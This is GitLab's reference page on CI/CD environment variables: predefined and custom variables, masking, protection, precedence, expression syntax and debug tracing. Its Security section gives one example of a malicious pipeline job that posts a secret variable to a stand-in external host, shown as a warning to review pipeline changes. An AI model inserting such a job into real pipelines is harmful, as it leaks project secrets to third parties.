.. | ||
img | ||
deprecated_variables.md | ||
predefined_variables.md | ||
README.md | ||
where_variables_can_be_used.md |
stage | group | info | type |
---|---|---|---|
Verify | Continuous Integration | To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers | reference |
GitLab CI/CD environment variables
An environment variable is a dynamically-named value that can affect the way running processes behave on an operating system.
Environment variables are part of the environment in which a process runs. For example, a running process could:
- Use the value of a
TEMP
environment variable to know the correct location to store temporary files. - Use a
DATABASE_URL
variable for the URL to a database that can be reused in different scripts.
Variables are useful for customizing your jobs in GitLab CI/CD. When you use variables, you don't have to hard-code values.
For more information about advanced use of GitLab CI/CD:
- Get to productivity faster with these 7 advanced GitLab CI workflow hacks shared by GitLab engineers.
- Learn how the Cloud Native Computing Foundation (CNCF) eliminates the complexity of managing projects across many cloud providers with GitLab CI/CD.
Predefined environment variables
GitLab CI/CD has a default set of predefined variables that you can use without any additional specification. You can call issue numbers, user names, branch names, pipeline and commit IDs, and much more.
Predefined environment variables are provided by GitLab for the local environment of the runner.
GitLab reads the .gitlab-ci.yml
file and sends the information
to the runner, where the variables are exposed. The runner then runs the script commands.
Use predefined environment variables
You can choose one of the existing predefined variables to be output by the runner.
This example shows how to output a job's stage by using the predefined variable CI_JOB_STAGE
.
In your .gitlab-ci.yml
file, call the variable from your script. Ensure
you use the correct syntax.
test_variable:
stage: test
script:
- echo $CI_JOB_STAGE
In this case, the runner outputs the stage
for the
job test_variable
, which is test
:
Custom environment variables
When you need a specific custom environment variable, you can
set it up in the UI, in the API,
or directly in the .gitlab-ci.yml
file.
The variables are used by the runner any time the pipeline runs. You can also override variable values manually for a specific pipeline.
There are two types of variables: Variable and File. You cannot set types in
the .gitlab-ci.yml
file, but you can set them in the UI and API.
Create a custom variable in .gitlab-ci.yml
To create a custom env_var
variable in the .gitlab-ci.yml
file,
define the variable/value pair under variables
:
variables:
TEST: "HELLO WORLD"
You can then call its value in your script:
script:
- echo "$TEST"
For more details, see .gitlab-ci.yml
defined variables.
Create a custom variable in the UI
From within the UI, you can add or update custom environment variables:
-
Go to your project's Settings > CI/CD and expand the Variables section.
-
Click the Add Variable button. In the Add variable modal, fill in the details:
- Key: Must be one line, with no spaces, using only letters, numbers, or
_
. - Value: No limitations.
- Type:
File
orVariable
. - Environment scope:
All
, or specific environments. - Protect variable (Optional): If selected, the variable is only available in pipelines that run on protected branches or tags.
- Mask variable (Optional): If selected, the variable's Value is masked in job logs. The variable fails to save if the value does not meet the masking requirements.
- Key: Must be one line, with no spaces, using only letters, numbers, or
After a variable is created, you can update any of the details by clicking the {pencil} Edit button.
After you set a variable, call it from the .gitlab-ci.yml
file:
test_variable:
stage: test
script:
- echo $CI_JOB_STAGE # calls a predefined variable
- echo $TEST # calls a custom variable of type `env_var`
- echo $GREETING # calls a custom variable of type `file` that contains the path to the temp file
- cat $GREETING # the temp file itself contains the variable value
The output is:
Variables can only be updated or viewed by project members with maintainer permissions.
Security
Malicious code pushed to your .gitlab-ci.yml
file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a protected branch or protected tag, it could also compromise protected variables.
All merge requests that introduce changes to .gitlab-ci.yml
should be reviewed carefully before:
- Running a pipeline in the parent project for a merge request submitted from a forked project.
- Merging the changes.
Here is a simplified example of a malicious .gitlab-ci.yml
:
build:
script:
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
Custom environment variables of type Variable
Introduced in GitLab 11.11.
For variables with the type Variable, the runner creates an environment variable that uses the key for the name and the value for the value.
There are some predefined variables of this type, which may be further validated. They appear when you add or update a variable in the UI.
Custom environment variables of type File
Introduced in GitLab 11.11.
For variables with the type File, the runner creates an environment variable that uses the key for the name. For the value, the runner writes the variable value to a temporary file and uses this path.
You can use tools like the AWS CLI
and kubectl
to customize your configuration by using File type variables.
Previously, a common pattern was to read the value of a CI variable, save it in a file, and then use that file in your script:
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"
Instead of this, you can use a File type variable. For example, if you have the following variables:
- A variable of type Variable:
KUBE_URL
with the valuehttps://example.com
. - A variable of type File:
KUBE_CA_PEM
with a certificate as the value.
You can call them from .gitlab-ci.yml
, like this:
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
Mask a custom variable
Introduced in GitLab 11.10
Variables can be masked so that the value of the variable is hidden in job logs.
To mask a variable:
- Go to Settings > CI/CD.
- Expand the Variables section.
- Next to the variable you want to protect, click Edit.
- Select the Mask variable check box.
- Click Update variable.
Masked variable requirements
The value of the variable must:
- Be in a single line.
- Be at least 8 characters long.
- Not be a predefined or custom environment variable.
- Consist only of characters from the Base64 alphabet (RFC4648).
In GitLab 12.2
and newer,
@
and:
are also valid values.
You can't mask variables that don't meet these requirements.
Protect a custom variable
Introduced in GitLab 9.3.
Variables can be protected. When a variable is protected, it is only passed to pipelines running on protected branches or protected tags. The other pipelines do not get the protected variable.
To protect a variable:
- Go to Settings > CI/CD.
- Expand the Variables section.
- Next to the variable you want to protect, click Edit.
- Select the Protect variable check box.
- Click Update variable.
The variable is available for all subsequent pipelines.
Custom variables validated by GitLab
Some variables are listed in the UI so you can choose them more quickly.
Variable | Allowed Values | Introduced in |
---|---|---|
AWS_ACCESS_KEY_ID |
Any | 12.10 |
AWS_DEFAULT_REGION |
Any | 12.10 |
AWS_SECRET_ACCESS_KEY |
Any | 12.10 |
CAUTION: Caution: When you store credentials, there are security implications. If you are using AWS keys, for example, follow their best practices.
Syntax of environment variables in job scripts
All variables are set as environment variables in the build environment, and
they are accessible with normal methods that are used to access such variables.
In most cases bash
or sh
is used to execute the job script.
To access environment variables, use the syntax for your runner's shell.
Shell | Usage |
---|---|
bash/sh | $variable |
PowerShell | $env:variable (primary) or $variable |
Windows Batch | %variable% |
Bash
To access environment variables in bash, prefix the variable name with ($
):
job_name:
script:
- echo $CI_JOB_ID
PowerShell
To access variables in a Windows PowerShell environment, including system set
environment variables, prefix the variable name with ($env:
). Environment variables
set by GitLab CI can also be accessed by prefixing the variable name with ($
) with
GitLab Runner 1.0.0
and later.
job_name:
script:
- echo $env:CI_JOB_ID
- echo $CI_JOB_ID
- echo $env:PATH
In some cases environment variables may need to be surrounded by quotes to expand properly:
job_name:
script:
- D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test
Windows Batch
To access environment variables in Windows Batch, surround the variable
with (%
):
job_name:
script:
- echo %CI_JOB_ID%
List all environment variables
You can also list all environment variables with the export
command in Bash
or dir env:
command in PowerShell.
Be aware that this also exposes the values of all the variables
you set, in the job log:
job_name:
script:
- export
# - 'dir env:' # use this for PowerShell
Example values:
export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="master"
export CI_REPOSITORY_URL="https://gitlab-ci-token:abcde-1234ABCD5678ef@example.com/gitlab-org/gitlab-foss.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="abcde-1234ABCD5678ef"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss"
export CI_PROJECT_NAME="gitlab-foss"
export CI_PROJECT_TITLE="GitLab FOSS"
export CI_PROJECT_NAMESPACE="gitlab-org"
export CI_PROJECT_ROOT_NAMESPACE="gitlab-org"
export CI_PROJECT_PATH="gitlab-org/gitlab-foss"
export CI_PROJECT_URL="https://example.com/gitlab-org/gitlab-foss"
export CI_REGISTRY="registry.example.com"
export CI_REGISTRY_IMAGE="registry.example.com/gitlab-org/gitlab-foss"
export CI_REGISTRY_USER="gitlab-ci-token"
export CI_REGISTRY_PASSWORD="longalfanumstring"
export CI_RUNNER_ID="10"
export CI_RUNNER_DESCRIPTION="my runner"
export CI_RUNNER_TAGS="docker, linux"
export CI_SERVER="yes"
export CI_SERVER_URL="https://example.com"
export CI_SERVER_HOST="example.com"
export CI_SERVER_PORT="443"
export CI_SERVER_PROTOCOL="https"
export CI_SERVER_NAME="GitLab"
export CI_SERVER_REVISION="70606bf"
export CI_SERVER_VERSION="8.9.0"
export CI_SERVER_VERSION_MAJOR="8"
export CI_SERVER_VERSION_MINOR="9"
export CI_SERVER_VERSION_PATCH="0"
export GITLAB_USER_EMAIL="user@example.com"
export GITLAB_USER_ID="42"
.gitlab-ci.yml
defined variables
You can add variables that are set in the build environment to .gitlab-ci.yml
.
These variables are saved in the repository, and they
are meant to store non-sensitive project configuration, like RAILS_ENV
or
DATABASE_URL
.
For example, if you set the variable below globally (not inside a job), it is used in all executed commands and scripts:
variables:
DATABASE_URL: "postgres://postgres@postgres/my_database"
The YAML-defined variables are also set to all created service containers, so that you can fine tune them.
Variables can be defined at a global level, but also at a job level. To turn off global defined variables in your job, define an empty hash:
job_name:
variables: {}
You are able to use other variables inside your variable definition (or escape them with $$
):
variables:
LS_CMD: 'ls $FLAGS $$TMP_DIR'
FLAGS: '-al'
script:
- 'eval $LS_CMD' # will execute 'ls -al $TMP_DIR'
Group-level environment variables
Introduced in GitLab 9.4.
You can define per-project or per-group variables that are set in the pipeline environment. Group-level variables are stored out of the repository (not in .gitlab-ci.yml
). They are securely passed to GitLab Runner, which makes them available during a pipeline run.
We recommend using group environment variables to store secrets (like passwords, SSH keys, and credentials) for Premium users who:
- Do not use an external key store.
- Use GitLab's integration with HashiCorp Vault.
Group-level variables can be added by:
- Navigating to your group's Settings > CI/CD page.
- Inputting variable types, keys, and values in the Variables section. Any variables of subgroups are inherited recursively.
After you set them, they are available for all subsequent pipelines. Any group-level user defined variables can be viewed in projects by:
- Navigating to the project's Settings > CI/CD page.
- Expanding the Variables section.
Instance-level CI/CD environment variables
Introduced in GitLab 13.0.
Instance variables are useful for no longer needing to manually enter the same credentials repeatedly for all your projects. Instance-level variables are available to all projects and groups on the instance.
In GitLab 13.1 and later, the maximum number of instance-level variables is 25.
You can define instance-level variables via the UI or API.
To add an instance-level variable:
-
Navigate to your admin area's Settings > CI/CD and expand the Variables section.
-
Click the Add variable button, and fill in the details:
- Key: Must be one line, using only letters, numbers, or
_
(underscore), with no spaces. - Value: In GitLab 13.3 and later, 10,000 characters allowed. This is also bounded by the limits of the selected runner operating system. In GitLab 13.0 to 13.2, 700 characters allowed.
- Type:
File
orVariable
. - Protect variable (Optional): If selected, the variable is only available in pipelines that run on protected branches or tags.
- Mask variable (Optional): If selected, the variable's Value is not shown in job logs. The variable is not saved if the value does not meet the masking requirements.
- Key: Must be one line, using only letters, numbers, or
After a variable is created, you can update any of the details by clicking the {pencil} Edit button.
Enable or disable UI interface for instance-level CI/CD variables
The UI interface for Instance-level CI/CD variables is under development but ready for production use. It is deployed behind a feature flag that is enabled by default. GitLab administrators with access to the GitLab Rails console can opt to disable it for your instance.
To disable it:
Feature.disable(:instance_variables_ui)
To enable it:
Feature.enable(:instance_variables_ui)
Inherit environment variables
- Introduced in GitLab 13.0 behind a disabled feature flag:
ci_dependency_variables
.- Feature flag removed in GitLab 13.1.
You can inherit environment variables from dependent jobs.
This feature makes use of the artifacts:reports:dotenv
report feature.
Example with dependencies
keyword.
build:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
artifacts:
reports:
dotenv: build.env
deploy:
stage: deploy
script:
- echo $BUILD_VERSION # => hello
dependencies:
- build
Example with the needs
keyword:
build:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
artifacts:
reports:
dotenv: build.env
deploy:
stage: deploy
script:
- echo $BUILD_VERSION # => hello
needs:
- job: build
artifacts: true
Priority of environment variables
Variables of different types can take precedence over other variables, depending on where they are defined.
The order of precedence for variables is (from highest to lowest):
- Trigger variables, scheduled pipeline variables, and manual pipeline run variables.
- Project-level variables or protected variables.
- Group-level variables or protected variables.
- Instance-level variables or protected variables.
- Inherited environment variables.
- YAML-defined job-level variables.
- YAML-defined global variables.
- Deployment variables.
- Predefined environment variables.
For example, if you define:
API_TOKEN=secure
as a project variable.API_TOKEN=yaml
in your.gitlab-ci.yml
.
API_TOKEN
takes the value secure
as the project
variables take precedence over those defined in .gitlab-ci.yml
.
Unsupported variables
Variable names are limited by the underlying shell used to execute scripts (see available shells. Each shell has its own unique set of reserved variable names. Keep in mind the scope of environment variables to ensure a variable is defined in the scope in which you wish to use it.
Where variables can be used
This section describes where and how the different types of variables can be used.
Advanced use
Limit the environment scopes of environment variables
You can limit the environment scope of a variable by defining which environments it can be available for.
To learn more about scoping environments, see Scoping environments with specs.
Deployment environment variables
Introduced in GitLab 8.15.
Integrations that are responsible for deployment configuration may define their own variables that are set in the build environment. These variables are only defined for deployment jobs. Please consult the documentation of the integrations that you are using to learn which variables they define.
An example integration that defines deployment variables is the Kubernetes integration.
Auto DevOps environment variables
Introduced in GitLab 11.7.
You can configure Auto DevOps to
pass CI variables to the running application by prefixing the key of the
variable with K8S_SECRET_
.
These prefixed variables are then available as environment variables on the running application container.
CAUTION: Caution: Variables with multi-line values are not supported due to limitations with the Auto DevOps scripting environment.
Override a variable by manually running a pipeline
Introduced in GitLab 10.8.
You can override the value of a current variable by running a pipeline manually.
For instance, suppose you added a custom variable named $TEST
and you want to override it in a manual pipeline.
Navigate to your project's CI/CD > Pipelines and click Run pipeline. Choose the branch you want to run the pipeline for, then add a variable and its value in the UI:
The runner overrides the value previously set and uses the custom value for this specific pipeline.
Environment variables expressions
- Introduced in GitLab 10.7 for the
only
andexcept
CI keywords- Expanded in GitLab 12.3 with the
rules
keyword
Use variable expressions to limit which jobs are created within a pipeline after changes are pushed to GitLab.
In .gitlab-ci.yml
, variable expressions work with both:
rules
, which is the recommended approach, andonly
andexcept
, which are candidates for deprecation.
This is particularly useful in combination with variables and triggered pipeline variables.
deploy:
script: cap staging deploy
environment: staging
only:
variables:
- $RELEASE == "staging"
- $STAGING
Each expression provided is evaluated before a pipeline is created.
If any of the conditions in variables
evaluates to true when using only
,
a new job is created. If any of the expressions evaluates to true
when except
is being used, a job is not created.
This follows the usual rules for only
/ except
policies.
Syntax of environment variable expressions
Below you can find supported syntax reference.
Equality matching using a string
Examples:
$VARIABLE == "some value"
$VARIABLE != "some value"
(introduced in GitLab 11.11)
You can use equality operator ==
or !=
to compare a variable content to a
string. We support both, double quotes and single quotes to define a string
value, so both $VARIABLE == "some value"
and $VARIABLE == 'some value'
are supported. "some value" == $VARIABLE
is correct too.
Checking for an undefined value
Examples:
$VARIABLE == null
$VARIABLE != null
(introduced in GitLab 11.11)
It sometimes happens that you want to check whether a variable is defined
or not. To do that, you can compare a variable to null
keyword, like
$VARIABLE == null
. This expression evaluates to true if
variable is not defined when ==
is used, or to false if !=
is used.
Checking for an empty variable
Examples:
$VARIABLE == ""
$VARIABLE != ""
(introduced in GitLab 11.11)
To check if a variable is defined but empty, compare it to:
- An empty string:
$VARIABLE == ''
- A non-empty string:
$VARIABLE != ""
Comparing two variables
Examples:
$VARIABLE_1 == $VARIABLE_2
$VARIABLE_1 != $VARIABLE_2
(introduced in GitLab 11.11)
It is possible to compare two variables. This compares values of these variables.
Variable presence check
Example: $STAGING
To create a job when there is some variable present, meaning it is defined and non-empty,
use the variable name as an expression, like $STAGING
. If the $STAGING
variable
is defined, and is non empty, expression evaluates to true
.
$STAGING
value needs to be a string, with length higher than zero.
Variable that contains only whitespace characters is not an empty variable.
Regex pattern matching
Introduced in GitLab 11.0
Examples:
=~
: True if pattern is matched. Ex:$VARIABLE =~ /^content.*/
!~
: True if pattern is not matched. Ex:$VARIABLE_1 !~ /^content.*/
(Introduced in GitLab 11.11)
Variable pattern matching with regular expressions uses the
RE2 regular expression syntax.
Expressions evaluate as true
if:
- Matches are found when using
=~
. - Matches are not found when using
!~
.
Pattern matching is case-sensitive by default. Use i
flag modifier, like
/pattern/i
to make a pattern case-insensitive.
Conjunction / Disjunction
Introduced in GitLab 12.0
Examples:
$VARIABLE1 =~ /^content.*/ && $VARIABLE2 == "something"
$VARIABLE1 =~ /^content.*/ && $VARIABLE2 =~ /thing$/ && $VARIABLE3
$VARIABLE1 =~ /^content.*/ || $VARIABLE2 =~ /thing$/ && $VARIABLE3
It is possible to join multiple conditions using &&
or ||
. Any of the otherwise
supported syntax may be used in a conjunctive or disjunctive statement.
Precedence of operators follows the
Ruby 2.5 standard,
so &&
is evaluated before ||
.
Parentheses
- Introduced in GitLab 13.3
- It's deployed behind a feature flag, enabled by default.
- It's enabled on GitLab.com.
- It's recommended for production use.
- For GitLab self-managed instances, GitLab administrators can opt to disable it. (CORE ONLY)
It is possible to use parentheses to group conditions. Parentheses have the highest precedence of all operators. Expressions enclosed in parentheses are evaluated first, and the result is used for the rest of the expression.
Many nested parentheses can be used to create complex conditions, and the inner-most
expressions in parentheses are evaluated first. For an expression to be valid an equal
number of (
and )
need to be used.
Examples:
($VARIABLE1 =~ /^content.*/ || $VARIABLE2) && ($VARIABLE3 =~ /thing$/ || $VARIABLE4)
($VARIABLE1 =~ /^content.*/ || $VARIABLE2 =~ /thing$/) && $VARIABLE3
$CI_COMMIT_BRANCH == "my-branch" || (($VARIABLE1 == "thing" || $VARIABLE2 == "thing") && $VARIABLE3)
Enable or disable parenthesis support for variables (CORE ONLY)
The feature is deployed behind a feature flag that is enabled by default. GitLab administrators with access to the GitLab Rails console can opt to disable it for your instance.
To disable it:
Feature.disable(:ci_if_parenthesis_enabled)
To enable it:
Feature.enable(:ci_if_parenthesis_enabled)
Storing regular expressions in variables
It is possible to store a regular expression in a variable, to be used for pattern matching:
variables:
STAGINGRELS: '/staging0|staging1/'
deploy_staging:
script: do.sh deploy staging
environment: staging
rules:
- if: '$RELEASE =~ $STAGINGRELS'
NOTE: Note: The available regular expression syntax is limited. See related issue for more details.
If needed, you can use a test pipeline to determine whether a regular expression works in a variable. The example below tests the ^mast.*
regular expression directly,
as well as from within a variable:
variables:
MYSTRING: 'master'
MYREGEX: '/^mast.*/'
testdirect:
script: /bin/true
rules:
- if: '$MYSTRING =~ /^mast.*/'
testvariable:
script: /bin/true
rules:
- if: '$MYSTRING =~ $MYREGEX'
Debug logging
Introduced in GitLab Runner 1.7.
CAUTION: Warning: Enabling debug tracing can have severe security implications. The output will contain the content of all your variables and any other secrets! The output will be uploaded to the GitLab server and made visible in job logs!
By default, the runner hides most of the details of what it is doing when processing a job. This behavior keeps job logs short, and prevents secrets from being leaked into the log unless your script writes them to the screen.
If a job isn't working as expected, this can make the problem difficult to
investigate; in these cases, you can enable debug tracing in .gitlab-ci.yml
.
Available on GitLab Runner v1.7+, this feature enables the shell's execution log. This results in a verbose job log listing all commands that were run, variables that were set, and so on.
Before enabling this, you should ensure jobs are visible to team members only. You should also erase all generated job logs before making them visible again.
To enable debug logs (traces), set the CI_DEBUG_TRACE
variable to true
:
job_name:
variables:
CI_DEBUG_TRACE: "true"
Example truncated output with CI_DEBUG_TRACE
set to true
:
...
export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE"
if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then
echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\''
$'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace"
$'\''git'\'' "config" "fetch.recurseSubmodules" "false"
$'\''rm'\'' "-f" ".git/index.lock"
$'\''git'\'' "clean" "-ffdx"
$'\''git'\'' "reset" "--hard"
$'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git"
$'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds"
++ CI_BUILDS_DIR=/builds
++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ export CI_CONCURRENT_ID=87
++ CI_CONCURRENT_ID=87
++ export CI_CONCURRENT_PROJECT_ID=0
++ CI_CONCURRENT_PROJECT_ID=0
++ export CI_SERVER=yes
++ CI_SERVER=yes
++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp
++ echo -n '-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----'
++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ export CI_PIPELINE_ID=52666
++ CI_PIPELINE_ID=52666
++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ export CI_JOB_ID=7046507
++ CI_JOB_ID=7046507
++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ export CI_JOB_TOKEN=[MASKED]
++ CI_JOB_TOKEN=[MASKED]
++ export CI_BUILD_ID=379424655
++ CI_BUILD_ID=379424655
++ export CI_BUILD_TOKEN=[MASKED]
++ CI_BUILD_TOKEN=[MASKED]
++ export CI_REGISTRY_USER=gitlab-ci-token
++ CI_REGISTRY_USER=gitlab-ci-token
++ export CI_REGISTRY_PASSWORD=[MASKED]
++ CI_REGISTRY_PASSWORD=[MASKED]
++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ export CI_JOB_NAME=debug_trace
++ CI_JOB_NAME=debug_trace
++ export CI_JOB_STAGE=test
++ CI_JOB_STAGE=test
++ export CI_NODE_TOTAL=1
++ CI_NODE_TOTAL=1
++ export CI_BUILD_NAME=debug_trace
++ CI_BUILD_NAME=debug_trace
++ export CI_BUILD_STAGE=test
++ CI_BUILD_STAGE=test
++ export CI=true
++ CI=true
++ export GITLAB_CI=true
++ GITLAB_CI=true
++ export CI_SERVER_URL=https://gitlab.com:3000
++ CI_SERVER_URL=https://gitlab.com:3000
++ export CI_SERVER_HOST=gitlab.com
++ CI_SERVER_HOST=gitlab.com
++ export CI_SERVER_PORT=3000
++ CI_SERVER_PORT=3000
++ export CI_SERVER_PROTOCOL=https
++ CI_SERVER_PROTOCOL=https
++ export CI_SERVER_NAME=GitLab
++ CI_SERVER_NAME=GitLab
++ export CI_SERVER_VERSION=12.6.0-pre
++ CI_SERVER_VERSION=12.6.0-pre
++ export CI_SERVER_VERSION_MAJOR=12
++ CI_SERVER_VERSION_MAJOR=12
++ export CI_SERVER_VERSION_MINOR=6
++ CI_SERVER_VERSION_MINOR=6
++ export CI_SERVER_VERSION_PATCH=0
++ CI_SERVER_VERSION_PATCH=0
++ export CI_SERVER_REVISION=f4cc00ae823
++ CI_SERVER_REVISION=f4cc00ae823
++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ export CI_PROJECT_ID=17893
++ CI_PROJECT_ID=17893
++ export CI_PROJECT_NAME=ci-debug-trace
++ CI_PROJECT_NAME=ci-debug-trace
++ export CI_PROJECT_TITLE='GitLab FOSS'
++ CI_PROJECT_TITLE='GitLab FOSS'
++ export CI_PROJECT_PATH=gitlab-examples/ci-debug-trace
++ CI_PROJECT_PATH=gitlab-examples/ci-debug-trace
++ export CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace
++ CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace
++ export CI_PROJECT_NAMESPACE=gitlab-examples
++ CI_PROJECT_NAMESPACE=gitlab-examples
++ export CI_PROJECT_ROOT_NAMESPACE=gitlab-examples
++ CI_PROJECT_ROOT_NAMESPACE=gitlab-examples
++ export CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace
++ CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace
++ export CI_PROJECT_VISIBILITY=public
++ CI_PROJECT_VISIBILITY=public
++ export CI_PROJECT_REPOSITORY_LANGUAGES=
++ CI_PROJECT_REPOSITORY_LANGUAGES=
++ export CI_DEFAULT_BRANCH=master
++ CI_DEFAULT_BRANCH=master
++ export CI_REGISTRY=registry.gitlab.com
++ CI_REGISTRY=registry.gitlab.com
++ export CI_API_V4_URL=https://gitlab.com/api/v4
++ CI_API_V4_URL=https://gitlab.com/api/v4
++ export CI_PIPELINE_IID=123
++ CI_PIPELINE_IID=123
++ export CI_PIPELINE_SOURCE=web
++ CI_PIPELINE_SOURCE=web
++ export CI_CONFIG_PATH=.gitlab-ci.yml
++ CI_CONFIG_PATH=.gitlab-ci.yml
++ export CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045
++ CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045
++ export CI_COMMIT_SHORT_SHA=dd648b2e
++ CI_COMMIT_SHORT_SHA=dd648b2e
++ export CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000
++ CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000
++ export CI_COMMIT_REF_NAME=master
++ CI_COMMIT_REF_NAME=master
++ export CI_COMMIT_REF_SLUG=master
++ CI_COMMIT_REF_SLUG=master
++ export CI_COMMIT_MESSAGE=s/CI/Runner
++ CI_COMMIT_MESSAGE=s/CI/Runner
++ export CI_COMMIT_TITLE=s/CI/Runner
++ CI_COMMIT_TITLE=s/CI/Runner
++ export CI_COMMIT_DESCRIPTION=
++ CI_COMMIT_DESCRIPTION=
++ export CI_COMMIT_REF_PROTECTED=true
++ CI_COMMIT_REF_PROTECTED=true
++ export CI_BUILD_REF=dd648b2e48ce6518303b0bb580b2ee32fadaf045
++ CI_BUILD_REF=dd648b2e48ce6518303b0bb580b2ee32fadaf045
